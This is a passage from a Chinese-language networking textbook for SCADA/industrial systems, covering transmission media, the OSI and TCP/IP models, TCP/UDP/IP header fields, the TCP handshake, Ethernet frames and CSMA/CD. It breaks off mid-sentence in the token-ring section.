以有限微分代替微分,并且取绝对值,则有 图2.25 电磁波的频谱及其在通信中的应用 因此,如果给出了波段的带宽Δλ,就可以计算相应的频段Δf,接下来就可以计算该波段的数据传输速率了。波段越宽,数据传输速率越高。 1)无线电传播 国际电信联盟将无线电的频率划分为以下若干波段:低频(LF)、中频(MF)、高频(HF)、甚高频(VHF)、超高频(UHF)、特高频(SHF)、极高频(EHF)等。无线电波容易产生,而且容易绕过建筑物,因此被广泛用于无线通信。 2)微波传输 微波的工作频率在100MHz以上,沿着直线传播,而不是各个方向扩散,因此通过抛物状的天线可以将能量集中在一小束上,以获得极高的信噪比,并能传输很长的距离,但是发射天线与接收天线在位置上必须准确地对准。微波传输的方向性使许多发射设备可以和成排的多个接收设备一对一地通信而不会发生相互干扰。 由于微波沿直线传播,但地球表面是曲面,再加上建筑物和气候的影响,微波在地面上的传输距离一般在40~60km范围内。此外,微波不能绕过建筑物。因此,如果要实现长距离通信,需要设置中继站。 微波通信具有通信容量大、传输质量高、灵活性好、易于通过恶劣地区,而且微波通信投资相对较小,在通信中得到了广泛的应用。微波通信缺点是相邻两个站点之间不能有任何的阻挡物,容易受天气的干扰,保密性差。 3)卫星通信 卫星通信是另一种微波传输介质,可以看出是一种特殊的微波通信,与一般地面微波通信不同的是,它使用地球同步卫星作为中继站来转发微波信号。卫星通信在传统上都是作为远程通信的干线出现的,通常都是由一个大型的地面卫星基站收发信号,然后通过地面有线或无线网络到达用户的通信终端。 卫星通信系统具有覆盖面积大、传输距离远、通信频带宽、信道容量大、可多址通信、成网快、通信质量好和信道特性比较稳定等优点。其不足之处是传输延迟大,空间传播损耗比较严重,保密性差,制造和发射成本很高。在SCADA系统中,若采用卫星通信,多使用甚小口径终端系统或中低轨道通信卫星。 3.传输介质的选择 传输介质的选择取决于如下多方面的因素: (1)网络拓扑结构。 (2)通信的容量需求:支持所期望的网络通信量。 (3)可靠性要求:满足SCADA系统对通信质量的要求。 (4)使用的环境:在所要求的环境范围(温度、湿度、粉尘、振动等)内使用。 (5)成本要求:同轴电缆的费用介于双绞线和光缆之间,当通信容量较大且需要连接较多设备时,选择同轴电缆较合适。双绞线对于低通信容量的局域网来说,性价比最好,特别是对于室内非主干网布线。光缆的费用最高。 (6)速度要求:双绞线的传输速度最低,其次是同轴电缆和微波,光缆速度最快,对于高质量、高速度或者要求长距离数据传输时,光缆是最合适的传输介质。 (7)安全性:双绞线和同轴电缆是铜导线,因而容易被窃听,而从光缆上窃取数据十分困难。无线电或微波传输是不安全的,任何人使用一根天线就能接收数据。 2.6.4 网络体系结构与参考模型 1.网络体系结构 网络体系结构(Network Architecture)就是为了完成计算机间的通信,把计算机互联的功能层次化,并明确规定同层实体通信的协议及相邻层之间的接口服务。因此网络体系结构是计算机网络分层、各层协议、功能和层间接口的集合。不同的计算机网络在层的数量、各层的名称、内容和功能以及各相邻层之间的接口方面都是不一样的,然而,它们的共性就是每一层都是为它的邻接上层提供一定的服务而设置的,而且各层之间是相互独立的,高层不必知道低层的实现细节。这样,网络体系结构就能做到与具体的物理实现无关,只要它们遵守相同的协议就可以实现互联和操作。 TCP/IP模型和OSI模型是目前最典型的网络体系结构。TCP/IP的发展比OSI模型还要早几年,两者的设计目标都是为了实现异构计算机网络之间的协同工作。OSI模型和协议一开始就是作为国际标准来设计的,但其过于巨大和复杂,实现起来比较麻烦。相反,作为美国国防部的一个研究计划的TCP/IP,起先没有预计要成为一个国际标准,但令人始料不及的是它却成了实际中网络互连事实上的标准,其协议被广泛采用。实质上TCP/IP也没有什么模型,只是后来人们要把它和OSI模型进行比较,才比照着OSI的相应层的定义建立了TCP/IP参考模型。 2. 开放式系统互联参考模型 国际标准化组织开发了开放式系统互联参考模型以促进计算机系统的开放互联,开放式互联就是可在多个厂家的环境中支持互联。该模型为计算机间开放式通信所需要定义的功能层次建立了全球标准。 OSI模型将通信会话需要的各种进程划分成7个相对独立的功能层次,这些层次的组织是以在一个通信会话中事件发生的自然顺序为基础的,如图2.26所示。OSI参考模型中的7个层是:物理层、数据链路层、网络层、传输层、会话层、表示层和应用层。参考模型的下3层主要负责通信功能,一般称为通信子层,常以硬件和软件相结合的方式来实现;上3层属于资源子网的功能范畴,称为资源子网层,通常以软件方式来实现。传输层取衔接上下3层的作用。具体的网络分层关系如下。 (1)物理层(Physical Layer):OSI参考模型的第1层。物理层定义了电气、机械、有关程序的和功能的技术规范,目的是为了激活、维护和去激活终端系统之间的物理链接。 (2)数据链路层(Data Link Layer):OSI参考模型的第2层。这一层提供物理链路上的可靠的数据传输。数据链路层关系物理寻址、网络拓扑结构、线路规程、错误通告、帧的顺序传递和流量控制。 (3)网络层(Network Layer):OSI参考模型的第3层。本层提供两个终端系统之间的连接和路径选择。路由选择是在网络层发生的。 (4)传输层(Transport Layer ):OSI参考模型的第4层。本层负责两个端节点之间的可靠网络通信。传输层提供机制来建立、维护和终止虚电路,并传输错误检测和恢复,以及信息流量控制。 (5)会话层(Session Layer):OSI参考模型的第5层。此层负责建立、管理和停止应用程序会话和管理表示层实体之间的数据交换。 (6)表示层(Presentation Layer):OSI参考模型的第6层。此层保证某系统应用层发出的信息能被另一系统的应用层读懂。表示层与程序使用的数据结构有关,从而作为应用层处理数据传输语法。 (7)应用层(Application Layer):OSI参考模型的第7层。此层为处于OSI模型之外的应用程序(如电子邮件、文件传输和终端仿真)提供服务。应用层识别并确认欲通信合作伙伴的有效性(和连接它们所需要的资源),以及同步合作的应用程序,并建立关于差错恢复和数据完整性控制步骤的协议。 图2.26 OSI参考模型示意图 OSI参考模型定义了开放系统的层次结构和各层提供的服务,其成功之处在于清晰地分开了服务、接口和协议这3个容易混淆的概念。当然,由于种种原因,目前还没有一个完全遵循7层OSI模型的网络体系。 3.TCP/IP模型 传输控制协议/网际协议(Transmission Control Protocol/Internet Protocol,TCP/IP)是用于计算机和其他设备在网络上通信的一个协议簇,其名字是由这些协议中两个重要协议组成的,即传输控制协议TCP和网络互联协议IP。TCP/IP协议是一个开放的协议标准,独立于特定的计算机硬件与操作系统,特别是它具有通用的网络地址分配方案,使得在网络中的地址都具有唯一性,同时还提供了多种可靠的用户服务,使得TCP/IP广泛应用于各种网络,成为Internet的通信协议。 TCP/IP协议使用多层体系结构,可以分为4个层次: (1)网络接口层:网络接口层与OSI参考模型中的物理层和数据链路层相对应。事实上,TCP/IP本身并未定义该层的协议,而由参与互连的各网络使用自己的物理层和数据链路层协议,然后与TCP/IP的网络接口层进行连接。 (2)网际互联层:网际互联层对应于OSI参考模型的网络层,主要解决主机到主机的通信问题。该层有四个主要协议:网际协议(IP)、地址解析协议(ARP)、反向地址解析协议(RARP)和互联网控制报文协议(ICMP)。IP协议是网际互联层最重要的协议,它提供的是一个不可靠、无连接的数据报传递服务。 (3)传输层:传输层对应于OSI参考模型的传输层,为应用层实体提供端到端的通信功能。该层定义了两个主要的协议:传输控制协议(TCP)和用户数据报协议(UDP)。TCP协议提供的是一种可靠的、面向连接的数据传输服务;而UDP协议供的是不可靠的、无连接的数据传输服务。 (4)应用层:应用层对应于OSI参考模型的高层,为用户提供所需要的各种服务,例如,FTP、Telnet、DNS、SMTP等。 OSI参考模型和TCP/IP参考模型都是局域独立的协议栈的概念,它们的功能大体相似,它们的传输层及其以上的层都以应用为主导。两者的不同主要表现在虽然两者都采用了层次结构的概念,但前者是7层模型,后者是4层结构,如图2.27所示。此外,TCP/IP一开始就考虑到多种异构网的互联问题,而ISO模型最初只考虑到使用一种标准的公共数据网将各种不同的系统互联在一起。TCP/IP一开始就对面向连接和无连接并重,而OSI开始时只强调面向连接服务。 图2.27 OSI参考模型与TCP/IP参考模型的对比示意图 2.7 TCP/IP协议 在TCP/IP协议模型中,传输层位于网络层与应用层之间,其主要的功能是负责应用程序之间的通信,连接端口的管理、流量的控制、错误处理与数据重发等。本节重点介绍TCP/IP协议集中传输协议TCP、UDP和网际协议IP。 2.7.1 TCP协议 1.TCP协议概述 传输控制协议(TCP)是为同一网络中或者连接到一个互联网络系统的成对计算机提供可靠的主机到主机的通信协议。其主要目的是为驻留在不同主机的进程之间提供可靠的、面向连接的数据传送服务。在网络体系结构中,TCP的上面是应用程序,下层是IP协议,TCP可以根据IP协议提供的服务传送大小不等的数据,IP协议负责对数据分段、重组,在多种网络上传送。 为了在并不可靠的网络上实现面向连接的可靠的数据传送,TCP必须解决可靠性、流量控制的问题,必须能够为上层应用程序提供多个接口,同时为多个应用程序提供数据,而且必须解决连接问题,这样TCP才能称为面向连接的可靠的协议。TCP通过下列方式来实现数据的可靠传输: (1)将信息分割成TCP认为最适合发送的数据块。 (2)当TCP发出一个段后,它启动一个定时器,等待目的端确认接收到这个报文段。如果不能及时收到这个确认,将重发这个报文段。 (3)当TCP收到发自TCP连接另一端的数据,它将发送一个确认。这个确认不是立即发送,而是延迟一段时间。 (4)TCP将保持它首部和数据的校验和。如果收到段的校验和有差错,TCP将丢弃这个报文段和不确认收到此报文段(希望发端超时并重发)。 (5)TCP报文段作为IP数据包来传输,而IP数据包的到达可能会失序,因此TCP的到达也可能会失序。如果必要,TCP将对收到的数据进行重新排序。 (6)IP数据包会发生重复,TCP的接收端必须丢弃重复的数据。 (7)TCP还能提供流量控制,这将防止较快主机致使较慢主机的缓冲区溢出。 TCP的数据传输具有5个特征:面向数据流、虚电路连接、有缓冲的传送、无结构的数据流和全双工连接。一旦数据包被破坏或丢失,则由TCP将其重新传输。 2.TCP的结构 TCP数据在IP数据报中的封装如图2.28所示。 图2.28 TCP数据报格式 TCP数据包头格式如表2.6所示。每个TCP段都包含源端和目的端的端口号,用于寻找发端和收端应用进程。这两个值加上IP包头中的源端IP地址和目的端IP地址,唯一确定一个TCP连接。有时,一个IP地址和一个端口号也称为一个插口(socket),插口对(socket pair)(包含客户IP地址、客户端口号、服务器IP地址和服务器端口号的四元组)可唯一确定互联网络中每个TCP连接的双方。 表2.6 TCP数据包头格式 序号用来标识从TCP发端向TCP收端发送的数据字节流。它表示在这个报文段中的第一个数据字节。如果将字节流看作在两个应用程序间的单向流动,则TCP用序号对每个字节进行计数。序号是32位的无符号数,序号到达231后又从0开始。存在同步序列(SYN)时,当建立一个新的连接时,SYN标志变1。序号字段包含由这个主机选择的该连接的初始序号ISN(Initial Sequence Number)。该主机要发送数据的第一个字节序号为这个ISN加1,因为SYN标志消耗了一个序号。 确认序号包含发送确认的一端所期望收到的下一个序号,因此,确认序号应当是上次已成功收到数据字节序号加1。只有当后面的ACK标志为1时确认序号字段才有效。一旦一个连接建立起来,这个字段总是被设置,ACK标志也总是被设置为1。 首部长度给出首部中32位字的数目表明段中数据开始的位置。之所以需要此字段是因为选项字段长度可变(与报头一样)。 在TCP首部中有6个标志位,它们中的多个可同时被设置为1。 · URG:紧急指针(urgent pointer)有效。 · ACK:确认序号有效。 · PSH:接收方应该尽快将这个报文段交给应用层。 · RST:重建连接。 · SYN:同步序号用来发起一个连接。 · FIN:发端完成发送任务。 · 窗口大小声明段发送者可接收的字节数,该编号以确认字段编号的首位开始。 · 校验和证明段传送无误,如果传送错误则丢弃该段。 · 紧急指针是一个正的偏移量,与序号字段中的值相加表示紧急数据最后一个字节的序号。只有在URG置位时才有效,紧急方式是发送端向另一端发送紧急数据的一种方式。 · 选项表示TCP选项的长度可变字段。 3.TCP连接的建立和终止 TCP协议栈支持同时建立两个TCP连接:一个为主动连接;另一个为被动连接。TCP是基于连接的协议,因为必须保持对TCP连接状态的监视和状态有关的信息保存在发送控制块中,而TCP连接状态的改变由TCP的软件状态机来实现。软件状态机又由事件或用户来触发。比如,当监视到一个带有SYN标志的TCP报到达时,状态机就将TCP连接转换到接收状态,用户也可以手工控制状态机处于发送状态来建立TCP连接。 建立了TCP连接,才可以发送或接收数据。接收数据时,上层协议(ULP)按字节发送,并被划分到TCP数据片中,经过状态机去掉TCP包头后再送到应用层;发送数据时,软件状态机会在数据前面加上TCP包头再发送到IP层。发送数据时,有一点值得关注:为了防止接收缓冲区的溢出,相对于发送数据包,协议栈给予接收数据包以更高的优先级。也就是说,协议栈软件会一直处理接收的数据包,直到接收缓冲区中没有任何数据。 TCP是一个面向连接的协议。从一方向另一方发送数据之前,都必须先在双方之间建立一条连接。 为了建立一条TCP连接,必须经过以下3次握手过程: (1)请求端(通常称为客户)发送一个SYN段来指明客户打算连接的服务器的端口,以及初始序号ISN。这个SYN段为报文段1。 (2)服务器发回包含服务器的初始序号的SYN报文段(报文段2)作为应答。同时,将确认序号设置为客户的ISN加1以对客户的SYN报文段进行确认。一个SYN将占用一个序号。 (3)客户必须将确认序号设置为服务器的ISN加1以对服务器的SYN报文段进行确认(报文段3)。在此过程中,发送第一个SYN的一端将执行主动打开(active open),接收这个SYN并发回一个SYN的另一端执行被动打开(passive open)。 建立一个连接需要3次握手,而终止一个TCP连接要经过4次握手。因为一个TCP连接是全双工的,所以每个方向必须单独的关闭。收到一个FIN只意味着这一方向上没有数据流动,一个TCP连接在接收到一个FIN后仍能发送数据。首先进行关闭的一方(即发送第一个FIN)将执行主动关闭,而另一方(收到这个FIN)将执行被动关闭。 2.7.2 UDP协议 1.UDP协议概述 UDP(用户数据报协议)主要用来支持那些需要在计算机之间传输数据的网络应用。众多的客户机/服务器模式的网络系统都使用,UDP。与TCP协议一样,在TCP/IP协议层次模型中,UDP位于IP层之上应用程序范围,UDP层然后使用IP层传送数据。IP层的包头表明了源主机的和目的主机地址,而UDP层的包头指明了主机上的源端口和目的端口。 UDP是一个简单的面向数据报的传输层协议,进程的每个输出操作都正好产生一个UDP数据包,并组装成一份待发送的IP数据包。这与面向流字符的协议不同,如TCP,应用程序产生的全体数据与真正发送的单个IP数据包可能没有什么联系。UDP协议和TCP相似,同属传输层协议,都作为应用程序和网络传输的中介。 与TCP协议相比,UDP不提供可靠性,它把应用程序传给IP层的数据发送出去,但是并不保证它们能到达目的地。但UDP提供某种程度的差错控制,它只完成非常有限的差错检验。如果UDP检测出在收到的分组中有一个差错,它就悄悄地丢弃这个分组。UDP的优点协议非常简单,且开销最小。若一个进程想发送一个很短的报文而不关心可靠性,使用UDP要比使用TCP简单许多。 2.UDP数据包格式 UDP数据包封装成一份IP数据包的格式如图2.29所示。数据包包含IP首部、UDP首部和UDP数据。 图2.29 UDP数据包格式 UDP首部的各字段如表2.7所示。 表2.7 UDP首部字段 端口号表示发送进程和接收进程。由于IP层已经把IP数据包分配给TCP或UDP(根据IP首部中协议字段值),因此TCP端口号由TCP来查看,而UDP端口号由UDP来查看。TCP端口号与UDP端口号是相互独立的。尽管相互独立,如果TCP和UDP同时提供某种知名服务,两个协议通常选择相同的端口号。这纯粹是为了使用方便,而不是协议本身的要求。 UDP长度字段:指的是UDP首部和UDP数据的字节长度。该字段的最小值为8字节(发送一份0字节的UDP数据包是0KB)。这个UDP长度是有冗余的。IP数据包长度指的是数据包全长,因此UDP数据包长度是全长减去IP首部的长度(该值在首部长度字段中指定)。 检验和:检验出现的差错。UDP的检验和与IP的检验和不同。UDP检验和覆盖UDP首部和UDP数据,TCP也是这样,但UDP的检验和是可选的,而TCP的检验和是必需的。 UDP数据包的长度可以为奇数字节,但是检验和算法是把若干个16位字相加。解决方法是必要时在最后增加填充字节0,这只是为了检验和的计算(也就是说,可能增加的填充字节不被传送)。 UDP数据包和TCP段都包含一个12字节长的伪首部,它是为了计算检验和而设置的。伪首部包含IP首部一些字段,其目的是让UDP两次检查数据是否已经正确到达目的地(例如,IP没有接收地址不是本主机的数据包,以及IP没有把应传给另一高层的数据包传给UDP)。 UDP数据包中的伪首部格式如图2.30所示。在图中,如果数据长度是奇数,在进行检验和计算时必须加上填充字节。 图2.30 UDP数据包中的伪首部格式 2.7.3 网络层IP协议 1.IP协议概述 IP协议是开放系统互连模型的一个主要协议,是TCP/IP协议族使用的传输机制,也是TCP/IP协议族中最为核心的协议。所有的TCP、UDP、ICMP及IGMP数据都以IP数据包格式传输。 IP协议位于TCP/IP模型的网络层,对上可接收传输层各种协议的信息,如TCP、UDP等;对下可将IP数据包传送到链路层,通过以太网、令牌环网等各种技术传输。从应用角度看,IP协议提供一种无连接、不可靠、尽力发送的服务。其中无连接表示每个IP数据包都是独立发送的,因此它必须包含目的地址,每一个分组使用不同的路由传到目的站;不可靠表示在传输过程中,IP数据包可能出现丢失、延时等差错,数据包可能不按顺序到达。尽力发送是指TCP/IP并不随意地放弃数据包。 IP协议根据其版本可以分为IPv4和IPv6。目前在使用的主要是IPv4。 IP可提供的服务可分为两项:IP数据包的传送;IP数据包的分段和重装。与IP协议配套使用的还有3个协议:地址解析协议ARP、反向地址解析协议RARP和因特网控制报文协议ICMP。 2.IP数据包的格式 IP层分组称为数据包,是一个变长分组。它由首部和数据两部分组成。其中,首部由两部分组成:固定部分+可变部分。固定部分长度为20字节,可变部分由选项组成,最长为40字节。 IP数据包的格式如表2.8所示。 表2.8 IP数据包格式 (1)版本:一般为4位,所有字段按版本号4来解释。若目的机器使用其他版本,则应丢弃数据包,而不错误地解释数据。 (2)首部长度:定义数据包以4字节计算的总长度。由于它是一个4比特字段,因此首部最长为60字节。没有选项时首部长度为20字节,普通IP数据包(没有任何选择项)字段的值是5。 (3)服务类型(TOS):定义路由器如何处理此数据包。包括一个3位的优先子字段(现在已被忽略)遇到问题时根据优先级处理数据包,4位的TOS子字段和1位未用位,但必须置0,如图2.31所示。 图2.31 8位服务类型 D0~D2为优先字段,遇到问题时根据优先级处理数据包。版本4中用4位的TOS字段D、T、R和C分别代表:最小时延、最大吞吐量、最高可靠性和最小费用。4位中只能置其中1位。如果所有4位均为0,那么就意味着是一般服务。0000代表“正常(默认)”;0001代表“最小费用”;0010代表“最高可靠性”;0100代表“最大吞吐量”;1000代表“最小延时”。选择的原则为:交互式活动属于需要立即引起注意的活动,和需要立即响应的活动,所以需要最小延时;发送成块数据需要最大吞吐量;管理活动需要最高可靠性;后台活动需要最小费用。 (4)总长度:是一个两字节的域,能定义的长度最长可达65536字节。当数据报被分片时,该字段的值也随着变化。 (5)标识符字段:唯一的标识主机发送的每一份数据包。通常每发送一份报文它的值就会加1。 (6)标志位字段:3位组成,用于控制分段。第1位没有使用,接着是不分段DF和段未完MF标志。 DF为1时表示不允许机器将该数据包分片。若不分片就无法将此数据包通过任何可用的物理网络进行转发时,该数据包丢弃。同时向源站发ICMP差错报文。0表示必要时可分片。 MF表示该数据包是否还有其他片标志。1表示此数据包不是最后的分片,0表示此数据包是最后的分片或唯一分片。 (7)分段偏移字段:表示分片在整个数据包中的位置。以8字节为度量单位,故13位。将数据包进行分片的主机或路由器必须这样选择每一个分片的长度,即第一个字节数应能被8除尽。若对一个已分片的数据包再进行分片,分片偏移永远是相对于原始数据报的。 (8)生存时间字段TTL(time-to-live):设置了数据包可以经过的最多路由器数。它指定了数据包的生存时间。TTL的初始值由源主机设置(通常为32或64),一旦经过一个处理它的路由器,它的值就减去1。当该字段的值为0时,数据包就被丢弃,并发送ICMP报文通知源主机。 (9)首部检验和字段:根据IP首部计算的检验和码。它不对首部后面的数据进行计算。而在ICMP、IGMP、UDP和TCP各自的首部中均含有同时覆盖首部和数据的检验和码。 (10)协议字段:指定哪种高级协议可用来产生数据包数据区中携带的消息。也即指定采用哪一种传输层协议。对于ICMP此值为1,TCP为6,UDP为17,IPv6为41。 (11)源IP地址和目的IP地址指定发送者和所期望的接收者的IP地址。 (12)选项是一长度可变的字段用于各种选项。如记录所采用的路由,指定所采用的路由以及时标等。目前,这些任选项定义如下: · 安全和处理限制(用于军事领域)。 · 记录路径(让每个路由器都记下它的IP地址)。 · 时间戳(让每个路由器都记下它的IP地址和时间)。 · 宽松的源站选路(为数据报指定一系列必须经过的IP地址)。 · 严格的源站选路(与宽松的源站选路类似,但是要求只能经过指定的这些地址,不能经过其他的地址)。 2.8 工业以太网 2.8.1 以太网技术 1.以太网概述 以太网(Ethernet)起源于20世纪60年代后期美国夏威夷大学的ALOHA网络。当时研究人员将夏威夷群岛的几所大学校园网站用无线电相连,通过一种争用技术,演示了网络上的多个节点可以使用同一个信道进行通信,它们可以在有数据要发送的任何时候发送数据。该方法没有提供一个节点检测是否有另外一个节点正在发送数据的机制,也没有对有可能发生的冲突进行处理的过程,所以当两个或多个节点同时试图发送数据时就会发生冲突。由于没有机制来处理同时发送数据的不可测事件,所以ALOHA网络需要多次传送。 以太网是一种局域网协议,它是20世纪70年代中期由Xerox公司、Intel公司,以及数据设备公司(DEC)联合开发的。在ALOHA网络的基础上,开发了一种采用带有冲突检测的载波侦听多址访问(CSMA/CD)协议的网络来连接办公室的计算机、打印机等办公设备,并将该网络命名为以太网。 以太网经历了几十年的发展,其间出现了各种类型的以太网版本和标准,目前使用的以太网都是指符合IEEE802.3标准的以太网,该标准已经成为国际上最流行的局域网标准之一。在以太网802.3标准中,规定了OSI参考模型中物理层和数据链路层中MAC子层的网络协议。其中,物理层定义了传输介质、连接器、电信号类型和网络拓扑,用于完成数据的编译码和信道访问。数据链路层规定了介质访问协议和数据传输的帧格式,主要实现数据拆装和链路的管理,保证数据帧在链路上无差错地可靠传输。 Ethernet采用星型或总线型结构,传输速率为l0Mb/s、100Mb/s、1000Mb/s或更高,以太网物理层传输电缆常用的是10BASE-T双绞线电缆,此外还有10BASE-2(细缆)、10BASE-5(粗缆),在高速传输和有干扰的场合,采用100BASE-F(光纤)。网络机制从早期的共享式发展到目前盛行的交换式,工作方式从单工发展到全双工。数据编码采用曼彻斯特编码(Manchester Encoding)或差分曼彻斯特编码。其输出信号高电平为+0.85V,低电平为-0.85V,直流电压为0V。 在OSI层协议中,以太网本身只定义了物理层和数据链路层,作为一个完整的通信系统,它需要高层协议的支持。自从APARNET将TCP/IP和以太网捆绑在一起之后,以太网便采用TCP/IP作为其高层协议,TCP用来保证传输的可靠性,IP则用来确定信息传递路线。TCP/IP协议在2.7节已做了介绍。 2. 以太网的数据链路层帧格式 以太网的数据链路层分为媒体访问控制(MAC)子层和逻辑链路控制(LLC)子层。MAC子层的任务是解决网络上的所有节点共享一个信道所带来的信道争用问题;LLC子层的任务是把要传输的数据组成帧,并且解决差错控制和流量控制的问题,从而在不可靠的物理链路上实现可靠的数据传输。以太网CSMA/CD的介质访问方式具体内容将在2.8.2节介绍,这里对以太网帧格式做简单介绍。 由于历史的原因,以太网帧格式多达5种。但如今多数TCP/IP应用都是用IEEE802.3 V2帧格式,而交换机之间的BPDU(桥协议数据单元)数据包则是IEEE802.3/LLC的帧,VLAN Trunk协议如802.1Q和Cisco的CDP等则是采用IEEE802.3SNAP的帧。 以太网帧的开始处都有64比特(8字节)的前导码。其中,前7个字节称为前同步码(Preamble),内容是16进制数0xAA,最后1字节为帧起始标志码0xAB,它标识着以太网帧的开始。前导码的作用是提醒接收系统有帧的到来,以及使到来的帧与计时器进行同步。前导码其实是在物理层添加上去的,并不是(正式的)帧的一部分。其目标是允许物理层在接收到实际的帧起始符之前检测载波,并且与接收到的帧时序达到稳定同步。除此之外,不同格式的以太网帧的各字段定义都不相同,彼此也不兼容。802.3SNAP帧格式如图2.32所示。 图2.32 IEEE802.3以太网帧格式 该帧由IEEE802.3报头、IEEE802.2 LLC报头、SNAP报头、数据和802.3报尾组成。SNAP也带有LLC头,但是扩展了LLC属性,添加了一个2字节的协议类型域(同时将SAP的值置为AA),从而使其可以标识更多的上层协议类型;另外添加了一个3字节的厂商代码字段用于标记不同的组织。 具体说明如下: 目的地址(DA)48位,表示帧准备发往目的站的地址,共6个字节,可以是单址(代表单个站)、多址(代表一组站)或全地址(代表局域网上的所有站)。当目的地址出现多址时,表示该帧被一组站同时接收,称为“组播”(Multicast)。目的地址出现全地址时,表示该帧被局域网上所有站同时接收,称为“广播”(Broadcast),通常以DA的最高位来判断地址的类型,如果为“0”则表示单址,为“1”则表示组播,如果目的地址内容全为“1”,则表示该帧为广播帧。 源地址(SA)48位,表明该帧的数据是哪个网卡发出的,即发送端的网卡地址。网卡地址是唯一的。为了标识以太网上的每台主机,需要给每台主机上的网络适配器(网络接口卡)分配一个唯一的通信地址,即以太网地址或称为网卡的物理地址、MAC地址。IEEE负责为网络适配器制造厂商分配以太网地址块,各厂商为自己生产的每块网络适配器分配一个唯一的以太网地址。因为在每块网络适配器出厂时,其以太网地址就已被烧录到网络适配器中。所以,有时我们也将此地址称为烧录地址(Burned-In-Address,BIA)。 以太网地址长度为48比特,共6个字节,如图2.33所示。其中,前3字节为IEEE分配给厂商的厂商代码,后3字节为网络适配器编号。 图2.33 Ethernet的物理地址 长度字段2字节,指明紧随其后的以字节为单位的数据域字段的总长度,其取值范围为46~1500字节。 数据域字段由802.2报头与数据信息组成,其长度可为46~1500个字节。数据域字段的最小长度必须为46字节以保证帧长至少为64字节,如果所传送的信息数据长度过小,使帧的总长度无法达到64个字节的最小值,那么相应软件将会自动填充数据段,以确保整个帧的长度不低于64个字节。数据域字段的默认最大长度为1500字节。 在数据域字段中,前8个字节构成了802.2逻辑链路控制(LLC)的首部。包括两个服务访问点:源服务访问点(SSAP)和目的服务访问点(DSAP)。它们用于标识以太网帧所携带的上层数据类型,其值均为0xAA。1个字节的“控制”字段,一般被设为0x03,指明采用无连接服务的802.2无编号数据格式。3个字节的组织唯一标识符其值均为0x00。2个字节的“类型”字段,用来表示数据域的数据类型,如0x0800,表示IP数据报。由此可知实际的数据信息长度为38~1492字节。 帧检验序列(FCS)是32位冗余检验码(CRC),检验除前导码和FCS以外的内容。当发送站发出帧时,一边发送,一边逐位进行CRC检验。最后形成一个32位CRC检验和填在帧尾FCS位置中一起在媒体上传输。接收站接收后,从DA开始同样边接收边逐位进行CRC检验。最后接收站形成的检验和若与帧的检验和相同,则表示媒体上传输帧未被破坏。反之,接收站认为帧被破坏,则会通过一定的机制要求发送站重发该帧。 802.3帧长最大值1518,最小值64字节。 2.8.2 介质访问控制方式 在各种拓扑结构的网络通信中,需要解决在同一时间有多个节点发起通信而导致的争用传输介质的现象,需要采取某些措施来协调各个节点设备访问介质的顺序,即要实施介质访问控制。常用的介质访问控制方式有带冲突检测的载波监听多路访问(Carrier Sense Multiple Access/Collision Detect,CSMA/CD)、令牌环网和令牌总线3种方式。 1.CSMA/CD 总线形控制网络的特点是:成本较低;接入的节点数较少时,负载较轻,时延小,网络效率可满足要求;接入的节点数较多时,负载加重,时延明显增大,网络效率下降;时延不确定,对实时应用不利。为了解决共享总线冲突,多采用载波监听多路访问(CSMA)的介质访问控制协议。 CSMA的基本原理是:每个站点在发送数据前监听信道上其他站点是否在发送数据,如在发送,该站就不发送数据,从而减少发生冲突的可能,提高网络吞吐量。CSMA可以分为非坚持CSMA和坚持CSMA。 非坚持(persistent)CSMA是某站一旦侦听到信道忙,即发现其他站点在发送数据,就不坚持听下去,而是延迟一个随机的时间后重新监听。若进行载波监听时发现信道空闲,则将准备好的数据帧发送出去。 非坚持CSMA的一个明显缺点是,一旦监听到信道忙,马上延迟一个随机的时间再重新监听,但很可能在再次监听之前已经空闲。也就是说,非坚持CSMA不能将信道在刚变成空闲的时刻找出,这样一来就影响信道利用率的提高。为了克服这一缺点,可采用坚持CSMA。 坚持CSMA的特点是在监听到信道忙时,仍坚持听下去,一直坚持听到信道空闲为止。这时有两种不同的策略:一种是一听到信道空闲就立即发送数据帧,也就是“1-坚持”CSMA,其缺点是如果有两个或多个站点同时监听信道,则可能发生两站发送冲突,影响网络的吞吐量;另一种是当听到信道空闲时,以P的概率发送数据帧,而以(1-P)的概率延迟一个时间单位(时间单位等于最大的传播时延时间)重新监听。这种策略称为“P-坚持”CSMA。“P-坚持”CSMA是一种折中的算法,它一方面试图降低像“1-坚持”CSMA的冲突概率,另一方面又减少像非坚持CSMA的介质浪费。 由于CSMA算法没有检测冲突的功能,即使冲突已经发生,仍然要将已破坏的帧发送完,使总线的利用率降低。一种CSMA改进方案可以提高总线的利用率,称为载波监听多路访问/冲突检测(CSMA/CD)的协议。采用这种协议时,每个站点在发送数据帧期间,同时具有冲突检测的能力,一旦检测到冲突,就立即停止发送,这样信道的容量不至于因传送已经破坏的数据帧而浪费。 在实际网络中,为了使每个站点都能正确的判断是否发生了冲突,常采用强制冲突的措施,即当发送数据帧的站点一旦检测到发生了冲突,除了立即停止发送数据外,还要向总线上发送一串阻塞信号,来通知总线上各个站点冲突已经发生。 对于冲突检测所需的时间,基带总线和宽带总线是不一样的。对基带总线而言,冲突检测所需的时间等于任意两个站点之间最大的传播延迟时间的两倍。对宽带总线而言,冲突检测时间等于任意两个站点之间最大传播延迟时间的4倍。 CSMA/CD算法中,在检测到冲突并发完阻塞信号后,为了降低再冲突的概率,需要等待一个随机时间,然后再用CSMA的算法发送。为了决定这个随机时间,常用一种称为二进制指数退避的算法。这个算法是按先进后出的次序控制的,即未发生冲突或很少发生冲突的帧具有优先发送的概率,而发生多次冲突的帧发送成功的概率反而小。 IEEE 802.3就是采用CSMA/CD介质访问控制协议,并使用二进制指数退避算法和“1-坚持”算法。这种算法在低负载时,当介质空闲时,要发送帧的站点就能立即发送;在重负载时,仍能保证系统稳定。它是基带系统,使用曼彻斯特编码,通过检测信道上的信号存在与否来实现载波监听。发送站的收发器检测冲突,如果发生冲突,收发器的电缆上的信号超过收发器本身发的信号幅度。由于在介质上传播的信号的衰减,为了正确的检测出冲突信号,以太网限制电缆的最大长度为500m。 2.令牌环网 令牌(token)环网是IBM公司于1984年提出的,现在已成为IEEE 802.5环状局域网标准。现在在商用领域已经很难再见到令牌环网,但由于其协议具有传输延迟的确定性的特点,在工业控制领域仍然占有一席之地。 这种介质访问控制方法的基础是令牌。令牌由IEEE 802.5帧中的SD、AC和ED字段组成,其中AC字段的第四位是令牌标志位。令牌标志位指出这是一个令牌,还是一个数据帧。该位为“0”是令牌,该位为“1”是数据帧。IEEE 